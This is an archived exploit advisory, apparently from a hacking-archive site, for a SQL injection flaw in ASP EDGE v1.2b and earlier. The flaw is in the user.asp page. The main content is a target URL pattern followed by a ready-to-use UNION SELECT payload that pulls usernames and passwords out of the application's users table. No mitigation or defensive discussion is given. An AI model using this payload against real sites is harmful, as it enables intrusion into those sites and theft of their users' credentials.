AOH :: Web :: General :: C07-2102.HTM

ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability

ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability
ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability



*******************************************************************************
# Title   :  ASP EDGE <= V1.2b (user.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page : http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4 
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//user.asp?user=[SQL] 

Example:

//user.asp?user='union%20select%20username,0,username,0,password,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.